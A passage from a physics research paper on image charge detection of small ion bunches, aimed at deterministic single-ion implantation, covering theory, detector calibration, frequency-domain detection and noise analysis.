(IBIC)7,14 are used as registration signal. For secondary electron detection and IBIC, the signal increases with the kinetic energy of the implanted ions, limiting the sensitivity for low ion energies. However, for a spatially highly precise ion placement, low kinetic energies are desirable, e.g. <5 keV for P in Si, to reduce ion straggling. Up to now, ion beam induced charge measurements have been demonstrated for P implantation in silicon with ion energies down to 14 keV7,14. As the sample has to serve as a detector in case of IBIC, it will be difficult to apply induced charge detection to arbitrary sample materials and depending on the material system and ion type, there is always a minimum kinetic energy required for successful detection. Pacheco and co-workers, for example, achieved a detection efficiency of 87% for 20 keV Sb ion implantation into a silicon based device18. In comparison, in image charge detection, a pre-detection scheme, the sensitivity only depends on the number of charges to be detected, so that at very low ion kinetic energies it has the potential of becoming the only viable detection scheme. The ultimate goal is to devise a method that allows deterministic implantation of any ion species - in the extreme case a single ion - with nanometre resolution into arbitrary samples with high throughput. Besides limitations to specific materials and ions, every post-detection method necessarily has to guarantee a detection efficiency of 100% for single ion implantation, while at the same time no false positives are allowed. It is shown below, that with a dedicated pre-detection scheme, a detection efficiency smaller than 100% does not impair the feasibility of the method, while under this condition, false positive detection events can be avoided much easier. The approach presented in this work is based on the signal induction by the image charge of a moving ion19. The fact that moving charges can induce a measurable image charge current was noticed in the 1930s and has been described theoretically by Shockley and Ramo20,21. The idea of the presented detection scheme is based on results in the mass spectrometry of large, slow molecules carrying a high number of net charges. When a moving charge passes a single electrode, the charge signal induced in that electrode is a peak in the time domain. In image charge mass spectrometry, ions are commonly trapped and cycled next to, or through a single hollow electrode using a dedicated ion optical arrangement, so that a periodic signal can be recorded and analysed. In terms of the signal-to-noise ratio (SNR), repeating a measurement N times improves the sensitivity by $$\mathrm{1/}\sqrt{N}$$ for uncorrelated noise. This means that by increasing the trapping time or equivalently the number of cycles through the electrode, the sensitivity is improved. This is also equivalent to decreasing the frequency bandwidth of the recorded periodic signal. Benner demonstrated such a measurement with a detection limit of 250 elementary charges (e)22. By increasing the trapping time to 3 s, i.e. decreasing the bandwidth, the detection limit was decreased to 7e by Jarrold and co-workers23,24,25,26. For implantation at the nanoscale, ions have to be detected on their linear trajectory on the way to the sample. Any other, more complicated trajectory, for example cycling ions for longer measurement duration, is incompatible with the high demand, i.e. the low acceptance, of the ion optical system required for spatially precise implantation. A linear array of electrodes offers the possibility to create a periodic signal in a single ion pass. Experimental results based on linear detector arrays have been demonstrated as well27,28,29. As long as the signal-to-noise ratio permits, mass and charge can be extracted from the time-of-flight and amplitude of the signal. For example, Smith et al. used autocorrelation analysis of recorded raw data to extract this information, although the signal did not in general extend significantly above the noise floor28. Theoretically, the length of such a linear array can be scaled arbitrarily to reach a detection limit of 1e, if the signal analysis can be carried out in the frequency domain27. In practice, however, the length is limited, for example, due to ion beam divergence. In comparison to previous work on mass spectrometry, the image charge detector (ICD) envisaged for ion implantation works in a completely different kinetic energy regime, i.e. the ions possess much faster velocities, much lower mass and generally a lower number of charges per ion. Furthermore, in contrast to the literature reviewed, real time signal analysis methods need to be explored that enable a proper pre-detection of the ion on its way to the sample. On the other hand, ion implantation has the decisive advantage that all parameters of the ions to be detected are known, whereas mass spectrometry has the aim of measuring unknowns. In this paper, the concept and optimal conditions for the application of image charge detection for deterministic implantation are explored. After a brief summary and review of image charge detector theory, our experimental results are presented, followed by a discussion of the possibilities for signal processing to realise a fast trigger output in case of successful detection. We believe that the presented study provides the starting point for the realisation of a single ion image charge detector. ## Theoretical Considerations First theoretical considerations about the instantaneous currents induced by moving electrons were presented by Shockley and Ramo20,21. For an arbitrary arrangement of moving charges and grounded electrodes, they derived the expression $${q}_{i}=-\,e{{\rm{\Phi }}}_{i}({\bf{r}})$$ (1) for the charge q i induced in a given electrode by a unit charge e at location r. The so called weighting potential Φi is calculated by setting the respective electrode to unit potential (V = 1, dimensionless) and all other electrodes to ground. If the point charge is moving with velocity v = dr/dt, it follows for the induced current $${I}_{i}=\frac{{\rm{d}}{q}_{i}}{{\rm{d}}t}=-\,e\nabla {{\rm{\Phi }}}_{i}({\bf{r}})\cdot \frac{{\rm{d}}{\bf{r}}}{{\rm{d}}t}=e{{\bf{E}}}_{{\rm{i}}}({\bf{r}})\cdot {\bf{v}}\mathrm{.}$$ (2) Here, the weighting field Ei has the unit m−1. The original derivations all refer to electrons, but if one considers an ion with more than one unit of charge, the elementary charge e in Eq. 2 is only multiplied by the number of charges. For demonstration, an ion is considered on a straight trajectory, travelling through an arrangement of three cylindrical electrodes, similar to an einzel lens (see Fig. 1a). The weighting potential is calculated with SIMION30 by setting the central electrode to unit potential (Fig. 1b). The potential along the ion trajectory is shown in Fig. 1c, together with the weighting field, i.e. its spatial derivative. In this example, the weighting potential reaches a value of about 0.9 at the centre of the electrode. This means that the maximum induced image charge is 0.9 times the charge of the ion. This factor and the distribution of the potential solely depend on the geometry of the electrode arrangement. As stated above in Eq. 2, the induced current is proportional both to the weighting field (red curve in Fig. 1c) and the ion velocity in the direction of this field. In addition, when measured, the signal formed in an electrical circuit connected to such an electrode will also depend on the type and characteristics of amplification. A transimpedance preamplifier produces a voltage signal proportional to the instantaneous current. Thus, the signal shape and amplitude are directly linked to the weighting field. For the latter to be increased, the electrode spacing would have to be reduced to achieve a higher gradient in the potential. However, this cannot be taken to extremes, because in practice, the rise time of the preamplifier is a strict limitation. The signal of a charge sensitive preamplifier, having a capacitor Cf as feedback component parallel to an operational amplifier, will be directly proportional to the weighting potential. The sensitivity is given by Cf and the image charge qi, such that the output voltage is $${V}_{{\rm{out}}}=\frac{{q}_{{\rm{i}}}}{{C}_{{\rm{f}}}}\mathrm{.}$$ (3) However, there are important restrictions. As the gain of the preamplifier is only given by Cf and the total input noise is amplified as well, the optimum signal-to-noise ratio depends both on the noise characteristics of the preamplifier input and the total capacitance at the input. A voltage preamplifier directly reacts to the voltage in the electrodes, which results from the image charge and the total capacitance comprising the capacitance of the electrode with respect to ground and the input capacitance of the preamplifier electronics, given by $${V}_{{\rm{out}}}=\frac{{q}_{{\rm{i}}}}{{C}_{{\rm{total}}}}\mathrm{.}$$ (4) If the electrode structure outlined so far is repeated in a linear array so that every even electrode is connected to the preamplifier input and the odd electrodes in between are grounded, an alternating signal results from a single ion passage. The geometry of the electrode array can be adjusted to yield a sinusoidal signal shape which effectively results in an AC voltage pulse with the finite duration determined by the ion velocity and the electrode array length. The amount of energy in the fundamental Fourier component and the bandwidth, given by the inverse of the duration of the signal, determine how well it can be recovered from noise. ## Experimental Methods A schematic of the set-up for image charge detection measurements is shown in Fig. 2. The whole set-up is mounted in a vacuum chamber evacuated to a base pressure of 1 × 10−6 mbar. An ion beam is created and focussed by a SPECS ion source ionising Argon, Nitrogen or other gases with thermally emitted electrons. Ions are accelerated to kinetic energies in the range from 15 keV and selected using a Wien filter. The beam blanker is controlled with a fast high voltage switch with a maximum potential of 500 V. In order to study the charge sensitivity of the detection set-up, ion bunches of sufficiently short duration are used to mimic ions of high charge state. For this purpose, rectangular voltage pulses are employed to form and transmit bunches of ions through the aperture. The rise time of the actual potential at the beam blanker plate was verified to be <25 ns. From the aperture system, the ion bunches move through the image charge detector (ICD) and into the Faraday cup (FC) used to measure the ion beam current with a Keithley 6485 Picoammeter. All cables inside and outside the chamber are shielded. The ICD signal is preamplified and analysed with a Rohde & Schwarz RTO2024 digital oscilloscope. In this work, two ICD systems were designed and studied. The first one (ICD1) is based on the Amptek A250 charge sensitive preamplifier and the second one (ICD2) uses the A250CF version of the preamplifier31,32. The results and discussion in this paper are focussed on the ICD2 set-up. Technical information about ICD1 and some results can be found in the supplementary material. In the ICD2 version, the preamplifier electronics is included in the A250CF package outside the chamber, connected to the detector array by BNC cables. The A250CF has a Peltier cooled input transistor and its feedback components are Cf = 0.5 pF and Rf = 1 GΩ. A buffer amplifier stage is built in between preamplifier and output (see Fig. 2b). Due to these specifications, ICD2 shows superior noise performance compared to ICD1. At the same time, it is less susceptible to electromagnetic interference problems, for example, from the beam blanker system, because it is placed outside the chamber. Within the ICD2 set-up, the number of electrodes and their lengths can be varied flexibly for the different types of experiments presented here, where the electrodes connected to the preamplifier are referred to as signal electrodes. All electrodes are made of copper and have a length of L = 8 mm, an inner diameter of 3.8 mm and an outer diameter of 5 mm. Neighbouring electrodes are separated by d = 2 mm insulating spacers. At first, for the charge calibration measurements, a single signal electrode is used (ICD2.1). For the formation of a periodic signal, several signal electrodes are used with every second electrode being a signal electrode and the separating electrodes being grounded. Hence, the maximum number of signal electrodes is five (ICD2.5), because in total ten electrodes can be accomodated into the electrode support of ICD2. In Fig. 2b, the three different electrode arrangements used are shown (without insulating spacers and holders). The schematic shows the simplified preamplifier electronics as it is connected to the signal electrodes in each case. The red curve at ICD2.1 is the current signal of an ion bunch travelling through the single signal electrode. The integrating circuit of the A250CF charge-sensitive preamplifier transforms it into the indicated voltage pulse Vout. The detailed signal shape, however, depends also on the length of the ion bunch. For more than one signal electrode the voltage pulse is repeated, forming a periodic signal which can be similar to a sinusoidal signal for ion bunches much shorter than the length of an electrode. Notice, that due to the integration of the two opposite current pulses of the ions going in and out of each signal electrode, the total induced charge is zero. Therefore, there is no exponential decay of the output voltage pulse as observed in standard photon or particle detection using similar preamplification. Also the rise-time of the preamplifier, which is in the order of 10 ns is no limitation to the measurements presented. ### Data availability The datasets generated and analysed in this work are available from the corresponding author on reasonable request. ## Results In order to evaluate the functionality of the electronic system comprised of the detector electrodes, preamplifier and their connections, different quantitative and qualitative measurements are necessary. First, a single electrode (ICD2.1) is used to determine the calibration factor of output voltage Vout to input number of charges. Then, the possibilities of combining a number of electrodes (ICD2.3, ICD2.5) at the input of a single preamplifier stage is explored, together with noise measurements and considerations of signal processing and real time analysis. ### Ion beam current calibration At Ebeam = 5 keV, the velocity of Argon ions with an atomic mass of 40 u is vi = 1.55 × 105 m/s, and so an electrode with L = 8 mm is traversed in $${t}_{{\rm{E}}}\approx 50\,ns$$. To calibrate the ICD response to the number of charges inside an electrode, long pulses (tpulse > tE) are used with a single signal electrode mounted and connected to the input of the preamplifier (ICD2.1). In this way, the electrode’s weighting potential is completely filled with a uniform distribution of charges and its integral yields the total effective image charge (similar reasoning was used in ref.33) $${Q}_{{\rm{icd}}}=\frac{{I}_{{\rm{beam}}}}{{v}_{{\rm{i}}}}{\int }_{-\infty }^{\infty }{{\rm{\Phi }}}_{{\rm{i}}}(x){\rm{d}}x\mathrm{.}$$ (5) To measure the ion beam current accurately and simultaneously during calibration, anti-pulses are used, i.e. the continuous beam is interrupted for a duration tpulse > tE, as only the step height between “beam on” and “off” is of interest. The interrupting anti-pulse is repeated with a frequency of 1 kHz. Thus, the total average current is only lowered by a factor of 2 in 1000 for a 2 µs long anti-pulse, and quick averaging of 100 single acquisitions is possible. Figure 3 shows the linear calibration of the output voltage as a function of ion beam current for ICD2. The notation Vout refers to the voltage as a function of time as measured by the oscilloscope, while Vicd is the height of the signal plateau as indicated in the graph. A typical result from averaging 100 pulses to determine the signal height Vicd is shown in Fig. 3 (inset). The signal plateau waveform is superimposed with statistical and systematic noise contributions. The two high frequency pulses at 0 µs and 2.0 µs are interferences from the fast switching of the beam blanker. The time between the first switching (at 0 µs) and the falling edge of the signal (at 0.7 µs) is the time of ion travel from beam blanker to the ICD signal electrode. The calibration curve in Fig. 3 is shown with its linear fit. Due to a dominant low frequency statistical noise component, the calibration was affected by systematic averaging errors introduced by an unstable baseline. To counteract, the number of averaged waveforms was lowered in some cases which explains the observed deviations from perfect linearity. This low-frequency noise is not expected though to impair the detection of individual ion bunches in the following. With the slope Vicd/Ibeam determined from the fit, the experimental sensitivity S can be calculated using Eqs 5 and 6. $$S=\frac{{V}_{{\rm{icd}}}/{I}_{{\rm{beam}}}}{{Q}_{{\rm{icd}}}/{I}_{{\rm{beam}}}}\mathrm{.}$$ (6) For ICD2.1, with $${\int }_{-16{\rm{mm}}}^{84{\rm{mm}}}{\rm{\Phi }}(x){\rm{d}}x=9.94\,{\rm{mm}}$$, a sensitivity of S = 3.16 V/pC is calculated. The integral corresponds to the integral in Eq. 5 and is determined along a trajectory coinciding with the ion optical axis from numerical SIMION simulations using the actual electrode geometries. The integration boundaries are given with respect to the centre of the electrode and limited by the size of the simulation. Nominally, the ICD2 preamplifier electronics has a sensitivity of 4.0 V/pC. The theoretical value is not reached in the experiment, which is attributed to uncertainties in the electronic components and impedance mismatches along the signal path. Nevertheless, the calibration is very well reproducible as long as the set-up is not changed and it is valid for all ICD2 configurations. ### Time domain detection If n electrodes are connected to the preamplifier input (compare Fig. 2b), the profile of the weighting potential should effect n peaks in the time domain signal, in case the ion bunch is shorter than the distance between two signal electrodes. Experimental confirmation for three electrodes (ICD2.3) is shown in the graph in Fig. 4 for ion bunches produced from a 3 keV Ar+ ion beam of 2.6 nA current. The time-of-flight between the electrodes is in agreement with calculation. Further measurements using two signal electrodes to determine the time of flight for different ion species and kinetic energies can be found in the supplementary material. ### Frequency domain detection and noise For frequency domain analysis, the maximum number of five signal electrodes was used (ICD2.5). Small 2 keV argon bunches produced from a 2.5 nA beam current were sent through the electrodes. The resulting periodic signal can easily be transformed into an FFT spectrum, as demonstrated in Fig. 5a. In this case, the time trace is recorded with full bandwidth and the FFT is performed live with the oscilloscope. Despite the included switching interferences and the short signal pulse, a clear peak rises above the background spectrum at 4.72 MHz. The velocity of the ions is calculated from the peak frequency and the known electrode arrangement, i.e. 20 mm periodic length. Taking into account the acceleration voltage, the ion mass can be calculated, making this experiment effectively a mass spectrometry measurement. Calculated velocities of ions with different kinetic energies are plotted in comparison with nominal values in Fig. 5b. Good agreement is demonstrated, but the fact that all values are slightly lower than the calculated ones points to a yet unknown systematic error in the set-up. Possible sources of this error are the reliability of setting the accelerating potential in the ion source, the Wien filter settings and probably also the FFT algorithm used. The sensitivity, that is the minimum number of charges detectable, depends on the noise of the preamplifier electronic system which includes the detector electrodes. Noise measurements of the two set-ups ICD1 and ICD2 reveal the differences in noise characteristics under different operating conditions. Measurements and explanations regarding ICD1 can be found in the supplementary material. The data from ICD2 is shown in Fig. 6. A digital 100 MHz low-pass filter was applied. The root-mean-square (rms) noise voltage as a function of the number N of individual acquisitions used for averaging follows the theoretically predicted statistical behaviour over a wide range of N (Fig. 6). This proves that significant contributions from systematic noise sources and interferences have been excluded by optimising the system and digital filtering. The frequency domain opens up the possibility to recover a signal from noise. Whereas in the time domain, a signal becomes recognisable only if it significantly exceeds the total rms noise level (noise floor), in frequency analysis, the SNR can be given as a function of the spectral noise density νrms and the fundamental frequency component Vpeak, together with its bandwidth Δf which results from the finite signal duration. Consequently, it can be taken as $${\rm{SNR}}=\frac{{V}_{{\rm{peak}}}}{\sqrt{{\rm{\Delta }}f}{v}_{{\rm{rms}}}}\mathrm{.}$$ (7) If the expected signal frequency is known, the existence of the signal can be probed in the Fourier spectrum, by setting a suitable threshold on a narrow interval around the expected frequency. If this threshold is exceeded, an ion or ion bunch is considered detected. In a deterministic single ion implantation process, the ion is permitted on its path to the sample only when the existence of the expected detector signal is registered (detection). This detection scheme has been tested for 4 keV Argon ion beam bunches in the live Fourier spectrum of single acquisitions using ICD2.5. Before the measurement, the ion beam current was lowered, so that a single bunch comprised approximately 300 ions, i.e. 300 elementary charges. In principle, the number of ions in each bunch might be subject to variations, as it cannot be measured simultaneously. The raw data shows that it is hardly possible to distinguish signal from noise in the time domain (Fig. 7). The number of detections divided by the total of 104 acquisitions which all contain an ion bunch signal is called detection efficiency or rate (or true positive rate). In order to determine the false positive rate, the beam is switched off. Now, none of the acquisitions contains an ICD signal and the number of false detections is counted. The successful detection and false positive rates for different thresholds set in the Fourier spectrum are given in Table 1. As can be seen, increasing the threshold reduces the false positive rate very effectively with an acceptable reduction of the detection rate. In a deterministic ion implantation experiment, low false positive rates are essential for laying down error-free arrays of single atoms. Here, a detection rate of, for example, 50 means that on average every second ion is discarded by a beam blanker downstream of the ICD and not implanted, because the ion was not successfully detected with the ICD. Effectively, a lower detection rate only results in a reduced implantation rate. ## Discussion In the current set-up, specific limitations inhibit the demonstration of a lower detection limit for the charge of an ion bunch. These include the method of bunch formation with an electric blanker, limited Wien filter accuracy, ion beam divergence and instabilities at very low beam currents. It can clearly be seen, that because of this, the extracted signal deviates significantly from a sinusoidal waveform with constant amplitude (see Fig. 5a). Therefore, the total signal power is not solely associated with the fundamental frequency given by velocity and electrode period. This affects the ability to detect in Fourier space. For example, the noise floor in the spectrum in Fig. 5a corresponds to less than 20 µV or 40e, but multiples of this number of charges are needed for observation, because the main Fourier peak carries only part of the signal. Furthermore, the form of the signal from a bunch of ions is determined by the convolution of weighting potential and ion distribution. However, when considering single ions instead of bunches, an ideal geometry for creating sinusoidal signals can be constructed easily. The standard charge sensitive preamplifier used here proves to be applicable, but crucial improvements in the electronic noise performance are still possible and necessary for the intended application. The development of a voltage preamplifier without feedback components which are not necessary for the sinusoidal ICD signals, is underway. In addition, the capacitance of the electrode structure to ground needs to be as low as possible for optimal SNR34. The detection and false positive rate measurements show that even for a signal very close to noise level, a threshold can be found to make detections in real time and exclude false positives with >99.9% probability. This threshold can be higher than the pure ICD signal, because the measurement contains the sum of signal and noise. At a low signal-to-noise ratio, there is a considerable probability that a component of the total noise spectrum contributes at the same frequency as the expected signal so that the sum of signal and noise surpasses the threshold, a phenomenon referred to as stochastic resonance35. For the aim of deterministic ion implantation, it will be required to open the beam blanker within a short time in the range of a few s after ion detection in the ICD. The real time signal analysis demonstrated here uses a modern oscilloscope able to produce a 5 V trigger output signal in response to certain trigger conditions, useful for such purposes (delay time: manufacturer36 800 ns, measured 802.9 ± 0.1 ns). This time delay is compatible with the flight time of the ion from the ICD to the beam blanker. For the envisaged single ion detection setup, it is planned to use ions charged up to much more than one elementary charge, if necessary, substantially increasing the signal strength above the noise floor. Especially, heavy ions like arsenic, antimony and bismuth are becoming interesting for silicon quantum technologies14. Even if they are prepared in high charge states, their velocity is not much higher than that of light-weight ions for the same acceleration potential. Furthermore, straggling is reduced for higher ion masses, allowing for higher spatial precision of the ion implant14. Using Eq. 4, a figure of merit for a dedicated voltage preamplifier for single ion detection is developed. State-of-the-art input transistors can be optimised with an input capacitance of, e.g. 0.5 pF and a total input noise of $$0.3\,{\rm{nV}}/\sqrt{{\rm{Hz}}}$$. Suppose, the whole image charge detector is split into individual segments, each connected to a transistor and preamplifier in order to reduce the input capacitance of each preamplifier. The outputs of the preamplifiers are then combined again. The electrodes connected to one transistor then exhibit a typical capacitance of 0.5 pF and the time-of-flight of one ion through the whole detector array is approximately 1 s. For an n = 5 times charged ion Vpeak = ne/Ctotal is ≈800 nV and the SNR as in Eq. 7 equates to $${\rm{SNR}}=\frac{800\,{\rm{nV}}}{\sqrt{1\,{\rm{MHz}}}\cdot 0.3\,{\rm{nV}}/\sqrt{{\rm{Hz}}}}=\frac{8}{3}\mathrm{.}$$ (8) These realistic values yield a SNR close to three which is sufficient for the envisaged detection, as the results above show. It is stressed, that this realistic opportunity of ion detection for deterministic implantation is enabled only by the specific situation of ion pre-detection with a detection probability allowed to be smaller than one. If the task were to achieve a detection rate of 100% or measure unknown properties of an ion, the SNR would be insufficient. To estimate the maximum possible single ion implantation rate, the rate of ions arriving at the detector and the detection rate are limiting factors. It should be avoided that two or more ions are inside the detector at the same time. If the time needed to traverse the detector is in the order of 1 µs, the probability for more than one ion arriving within that time can be calculated from the Poisson distribution and a given rate of ions. For 1 × 105 ions/s from the source, this probability is less than 0.01. With a detection rate of only 10%, about 1 × 104 implanted ions per second is well achievable. Electrical switching times for beam blanking and scanning etc. should not impose any limitations in the microsecond regime. ## Conclusion With this work, the state-of-the-art of image charge measurements is expanded towards application and optimisation of the ICD principle to the detection of a small number of low energy ions with the ultimate goal of single ion detecton for deterministic ion implantation in future. The central aspect is the fly-by detection during a single pass, including signal analysis within a limited time in the range smaller than 2 µs. An image charge detection system has been built from scratch, deploying readily available and specifically designed electronics. Calibration and time-of-flight measurements were compared to theoretical considerations. Further, it was demonstrated how by using a linear array of ICD electrodes, the real time data analysis of a single pass of an ion bunch can be transferred to the frequency domain, which is a significant ingredient for future single ion detection. A simple detection threshold can be found to exclude false positive detections with a probability close to one, while the detection rate is still above 25% for this critically low SNR. Work in the immediate future includes electrical simulations and experimental implementation of optimised electronics to lower the real time detection limit in the frequency domain below 10 elementary charges. Once again it is stressed, that the huge advantage of this approach to deterministic ion implantation is the possibility of discarding a certain fraction of ions from the source, allowing false positive detections to be sufficiently improbable. Live FFT, lock-in amplification or other algorithms implemented with dedicated electronics are tools that can be used to recover single ion fly-by signals in the frequency domain in real time, because the frequency of the signal is fixed and known. In addition to showing the feasibility and requirements of deterministic ion implantation via image charge detection the knowledge gained is believed to be useful for the diagnostics and analysis of low current charged particle beams. ## References 1. 1. Meijer, J. et al. Generation of single color centers by focused nitrogen implantation. Applied Physics Letters 87, 261909, https://doi.org/10.1063/1.2103389 (2005). 2. 2. Rabeau, J. R. et al. Implantation of labelled single nitrogen vacancy centers in diamond using N15. Applied Physics Letters 88, 023113, https://doi.org/10.1063/1.2158700 (2006). 3. 3. Dolde, F. et al. Room-temperature entanglement between single defect spins in diamond. Nature Physics 9, 139–143 http://rdcu.be/vSwu. https://doi.org/10.1038/nphys2545 (2013). 4. 4. Lesik, M. et al. Production of bulk NV centre arrays by shallow implantation and diamond CVD overgrowth. Physica status solidi (a) 213, 2594–2600, https://doi.org/10.1002/pssa.201600219 (2016). 5. 5. Schmitt, S. et al. Submillihertz magnetic spectroscopy performed with a nanoscale quantum sensor. Science 356, 832–837 http://science.sciencemag.org/content/356/6340/832. https://doi.org/10.1126/science.aam5532 (2017). 6. 6. Yang, C. et al. Single phosphorus ion implantation into prefabricated nanometre cells of silicon devices for quantum bit fabrication. Japanese Journal of Applied Physics 42, 4124 http://stacks.iop.org/1347-4065/42/i=6S/a=4124 (2003). 7. 7. van Donkelaar, J. et al. Single atom devices by ion implantation. Journal of Physics: Condensed Matter 27, 154204 http://stacks.iop.org/0953-8984/27/i=15/a=154204 (2015). 8. 8. Freer, S. et al. A single-atom quantum memory in silicon. Quantum Science and Technology 2, 015009 http://stacks.iop.org/2058-9565/2/i=1/a=015009 (2017). 9. 9. Pla, J. J. et al. A single-atom electron spin qubit in silicon. Nature 489, 541, https://doi.org/10.1038/nature11449 (2012). 10. 10. Pla, J. J. et al. High-fidelity readout and control of a nuclear spin qubit in silicon. Nature 496, 334 EP, https://doi.org/10.1038/nature12011 (2013). 11. 11. Jamieson, D. N. et al. Deterministic atom placement by ion implantation: Few and single atom devices for quantum computer technology. In 2016 21st International Conference on Ion Implantation Technology (IIT), 1–6 https://doi.org/10.1109/IIT.2016.7882858 (2016). 12. 12. DiVincenzo, D. P. The physical implementation of quantum computation. Fortschritte der Physik 48, 771–783 doi: 10.1002/1521-3978(200009)48:9/11<771::AID-PROP771>3.0.CO;2-E (2000). 13. 13. Shinada, T., Okamoto, S., Kobayashi, T. & Ohdomari, I. Enhancing semiconductor device performance using ordered dopant arrays. Nature 437, 1128–1131, https://doi.org/10.1038/nature04086 (2005). 14. 14. Jamieson, D. N. et al. Deterministic doping. Materials Science in Semiconductor Processing 62, 23–30 http://www.sciencedirect.com/science/article/pii/S1369800116304760. https://doi.org/10.1016/j.mssp.2016.10.039. Advanced doping methods in semiconductor devices and nanostructures (2017). 15. 15. Meijer, J. et al. Concept of deterministic single ion doping with sub-nm spatial resolution. Applied Physics A 83, 321–327, https://doi.org/10.1007/s00339-006-3497-0 (2006). 16. 16. Jacob, G. et al. Transmission microscopy with nanometer resolution using a deterministic single ion source. Phys. Rev. Lett. 117, 043001, https://doi.org/10.1103/PhysRevLett.117.043001 (2016). 17. 17. Matsukawa, T. et al. Development of single-ion implantation–controllability of implanted ion number. Applied Surface Science 117, 677–683 http://www.sciencedirect.com/science/article/pii/S0169433297801638. https://doi.org/10.1016/S0169-4332(97)80163-8 (1997). 18. 18. Pacheco, J. et al. Ion implantation for deterministic single atom devices. Review of Scientific Instruments 88, 123301, https://doi.org/10.1063/1.5001520 (2017). 19. 19. Gerlach, J. et al. Vorrichtung zur detektion einzelner geladener teilchen sowie system zur materialbearbeitung, das eine solche vorrichtung enthält https://www.google.com/patents/DE102015106769A1?cl=de. DE Patent App. DE201,510,106,769 (2016). 20. 20. Shockley, W. Currents to conductors induced by a moving point charge. Journal of Applied Physics 9, 635–636, https://doi.org/10.1063/1.1710367 (1938). 21. 21. Ramo, S. Currents induced by electron motion. Proceedings of the IRE 27, 584–585, https://doi.org/10.1109/JRPROC.1939.228757 (1939). 22. 22. Benner, W. H. A gated electrostatic ion trap to repetitiously measure the charge and m/z of large electrospray ions. Analytical Chemistry 69, 4162–4168, https://doi.org/10.1021/ac970163e (1997). 23. 23. Contino, N., Pierson, E., Keifer, D. & Jarrold, M. Charge detection mass spectrometry with resolved charge states. Journal of The American Society for Mass Spectrometry 24, 101–108, https://doi.org/10.1007/s13361-012-0525-5 (2013). 24. 24. Contino, N. C. & Jarrold, M. F. Charge detection mass spectrometry for single ions with a limit of detection of 30 charges. International Journal of Mass Spectrometry 345–347, 153–159 http://www.sciencedirect.com/science/article/pii/S1387380612002321. https://doi.org/10.1016/j.ijms.2012.07.010. 80/60: A special Issue honoring Keith R. Jennings and James H. Scrivens (2013). 25. 25. Pierson, E., Contino, N., Keifer, D. & Jarrold, M. Charge detection mass spectrometry for single ions with an uncertainty in the charge measurement of 0.65 e. Journal of The American Society for Mass Spectrometry 26, 1213–1220, https://doi.org/10.1007/s13361-015-1126-x (2015). 26. 26. Keifer, D. Z., Shinholt, D. L. & Jarrold, M. F. Charge detection mass spectrometry with almost perfect charge accuracy. Analytical Chemistry 87, 10330–10337 https://doi.org/10.1021/acs.analchem.5b02324. PMID: 26418830 (2015). 27. 27. Gamero-Castaño, M. Induction charge detector with multiple sensing stages. Review of Scientific Instruments 78 http://scitation.aip.org/content/aip/journal/rsi/78/4/10.1063/1.2721408. https://doi.org/10.1063/1.2721408 (2007). 28. 28. Smith, J. W., Siegel, E. E., Maze, J. T. & Jarrold, M. F. Image charge detection mass spectrometry: Pushing the envelope with sensitivity and accuracy. Analytical Chemistry 83, 950–956, https://doi.org/10.1021/ac102633p (2011). 29. 29. Barney, B. L., Daly, R. T. & Austin, D. E. A multi-stage image charge detector made from printed circuit boards. Review of Scientific Instruments 84 http://scitation.aip.org/content/aip/journal/rsi/84/11/10.1063/1.4828668. https://doi.org/10.1063/1.4828668 (2013). 30. 30. Simion version 8.1, http://www.simion.com/. Scientific Instrument Services Inc. 31. 31. A250CF specifications http://amptek.com/products/a250cf-coolfet-charge-sensitive-preamplifier. Amptek, Inc (2017). 32. 32. A250 specifications http://amptek.com/products/a250-charge-sensitive-preamplifier/. Amptek, Inc (2017). 33. 33. Alexander, J. D. et al. Determination of absolute ion yields from a maldi source through calibration of an image-charge detector. Measurement Science and Technology 21, 045802, http://stacks.iop.org/0957-0233/21/i=4/a=045802 (2010). 34. 34. Schmidt, S. et al. Non-destructive single-pass low-noise detection of ions in a beamline. Review of Scientific Instruments 86, 113302, https://doi.org/10.1063/1.4935551 (2015). 35. 35. Gammaitoni, L., Hänggi, P., Jung, P. & Marchesoni, F. Stochastic resonance. Rev. Mod. Phys. 70, 223–287, https://doi.org/10.1103/RevModPhys.70.223 (1998). 36. 36. Rohde & Schwarz, München. RTO Digital Oscilloscope Manual (2017). ## Acknowledgements We are thankful to our technical staff, Ronny Woyciechowski, Carsten Pahnke and Dipl.-Ing. Joachim Starke, as well as the staff at the workshops at Universität Leipzig and Leibniz Institute of Surface Engineering (IOM). We acknowledge the support by Raith GmbH Dortmund and Dreebit GmbH Großröhrsdorf. Furthermore, we thank Prof. Dr. S. Rauschenbach (University of Oxford and MPI Stuttgart), Dr. Stefan Stahl (Stahl Electronics Mettenheim) as well as Dr. Alexander Jakob and Prof. Dr. David N. Jamieson (University of Melbourne) for insightful discussions. This work is carried out within the Leibniz Joint Lab “Single Ion Implantation”, and funded by the Leibniz Association (SAW-2015-IOM-1), the European Union together with the Sächsisches Ministerium für Wissenschaft und Kunst (Project No. 100308873), the Volkswagen Stiftung and the German Academic Exchange Service (DAAD). We acknowledge support from the German Research Foundation (DFG) and Universität Leipzig within the program of Open Access Publishing. ## Author information Authors ### Contributions P.R. conducted the experiments, analysed the results with input from D.S. and J.M. and wrote the article. All authors contributed to setting up the experiment, discussed and reviewed the manuscript. ### Corresponding author Correspondence to Paul Räcke. ## Ethics declarations ### Competing Interests The authors declare no competing interests. Publisher's note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. ## Rights and permissions Reprints and Permissions Räcke, P., Spemann, D., Gerlach, J.W. et al. Detection of small bunches of ions using image charges. Sci Rep 8, 9781 (2018). https://doi.org/10.1038/s41598-018-28167-6 • Accepted: • Published: • ### Charge‐Assisted Engineering of Color Centers in Diamond • Tobias Lühmann • , Jan Meijer •  & Sébastien Pezzagna physica status solidi (a) (2021) • ### Single Ion Implantation of Bismuth • Nathan Cassidy • , Paul Blenkinsopp • , Ian Brown • , Richard J. Curry • , B. N. Murdin • , Roger Webb •  & David Cox physica status solidi (a) (2021) • ### Error Rates in Deterministic Ion Implantation for Qubit Arrays • B. N. Murdin • , Nathan Cassidy • , David Cox • , Roger Webb •  & Richard J. Curry physica status solidi (b) (2021) • ### Nanoscale ion implantation using focussed highly charged ions • Paul Räcke • , Ralf Wunderlich • , Jürgen W Gerlach • , Jan Meijer •  & Daniel Spemann New Journal of Physics (2020) • ### Simulation and measurement of image charge detection with printed-circuit-board detector and differential amplifier • Jace Rozsa • , Yixin Song • , Devon Webb • , Naomi Debaene • , Austin Kerr • , Elaura L. Gustafson • , Tabitha Caldwell • , Halle V. Murray • , Daniel E. Austin • , Shiuh-hua Wood Chiang •  & Aaron R. Hawkins Review of Scientific Instruments (2020)
